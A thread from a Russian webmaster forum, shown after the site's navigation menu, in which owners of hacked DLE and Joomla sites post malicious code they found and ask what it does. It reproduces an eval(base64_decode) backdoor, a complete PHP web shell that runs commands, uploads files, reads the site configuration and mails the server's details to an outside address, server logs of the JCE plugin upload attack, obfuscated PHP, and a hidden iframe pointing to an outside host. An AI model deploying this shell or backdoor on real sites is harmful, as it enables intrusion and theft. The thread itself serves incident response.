- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Всем привет. нашел у себя на сайте в engine/data/config.php и в dbconfig.php
такую херню:
if(!empty($_POST['g1'])) {
eval(base64_decode($_POST['g1']));
die;
}
if(!empty($_POST['g2'])) eval(base64_decode($_POST['g2']));
if(!empty($_GET['g2'])) eval(base64_decode($_GET['g2']));
Что она значит? И есть ли еще, где нибудь файлы связанные с этим скриптом?
kenduk, она означает, что если кто-то передаст скрипту переменную g1, то ее содержимое раскодируется из base64 и выполнится
так а где может лежать этот код base64. Я так понял он у меня, где то в других файлах?
kenduk, в GET или POST запросе извне
Ну если я удалю этот код, то не будет никаких сценариев?
kenduk, в этом месте не будет
Добрый день!
Вскрыли жумловский сайт и разместили закодированный в base64 вот такой файл
@ini_restore("disable_functions");if (!isset($_SESSION['bajak'])) {$visitcount = 0;$web = $_SERVER["HTTP_HOST"];$inj = $_SERVER["REQUEST_URI"];$body = "Shell Injector \n$web$inj";$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE = OFF";}else {$security= "SAFE_MODE = ON";};$df='ini_get disable!';$serper=gethostbyname($_SERVER['SERVER_ADDR']);$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);mail("peterdlegend@aol.com", "$body","Shell Result http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");$_SESSION['bajak'] = 0;}else {$_SESSION['bajak']++;};if(isset($_GET['clone'])){$source = $_SERVER['SCRIPT_FILENAME'];$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";rename($source, $desti);}$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE : OFF";}else {$security= "SAFE_MODE : ON";}echo "<title>Peterson - Shell</title><br>
<br>
";echo "<font size=2 color=#888888><b>".$security."</b><br>
";$cur_user="(".get_current_user().")";echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>
";echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>
";echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}function pwd() {$cwd = getcwd();if($u=strrpos($cwd,'/')){if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};}elseif($u=strrpos($cwd,'\\')){if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};};}echo '
<form method="POST" action="">
<font size=2 color=#888888><b>Command</b><br>
<input type="text" name="cmd"><input type="Submit" name="command" value="cok">
</form>
';echo '
<form enctype="multipart/form-data" action method=POST>
<font size=2 color=#888888><b>Upload File</b></font><br>
<input type=hidden name="submit"><input type=file name="userfile" size=28><br>
<font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload">
</form>
';if(isset($_POST['submit'])){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){echo "Upload Failed";} else { echo "Upload Success to ".$uploaddir.$name." :D "; }}if(isset($_POST['command'])){$cmd = $_POST['cmd'];echo "
<pre>
<font size=3 color=#000000>".shell_exec($cmd)."</font>
</pre>
";}else { echo "
<pre>
<font size=3 color=#000000>".shell_exec('ls -la')."</font>
</pre>
";}if(isset($_GET['baca'])){$conf = file_get_contents("../../configuration.php");echo $conf;}
Подскажите, что он делает и как это дело предотвратить, сайт на Joomla
Вот кусок log-файла
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:45 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "GET //images/stories/petx.gif HTTP/1.1" 200 1580 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:58 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:58 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?bajak HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?baca HTTP/1.1" 200 9152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0
www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:24 +0400] "GET /component/content//images/stories/petx.gif HTTP/1.1" 404 1107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0
На сайте стоит некий JCE Plugin Manager, как я понимаю вскрыли через него?
После влома сайта в index нашел закодированый скрипт
и файлик пхп со следущим содержанием - так понимаю сам шелл
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
вопрос в следушем возможно эту муть раскодироваь уж больно интересно глянуть что там
вопрос в следушем возможно эту муть раскодироваь уж больно интересно глянуть что там
Этот обрывок кода на шелл не тянет... Похоже на криво или не полностью обфусцированную гадость.
Этот обрывок кода на шелл не тянет... Похоже на криво или не полностью обфусцированную гадость.
возможно я еще что то ненашел... в индексе в закадированом виде прописали
<iframe src="http://quantum-life.com/ex/js/jquery/.svn/.INF/props/index.php?out=1378379469" width="0" height="0" frameborder="0"></iframe>
плюс пхп нашел с этим содержанием.... видимо надо рыть глубже... а возможно ка либо узнать что делает этот скрипт? во фрейме который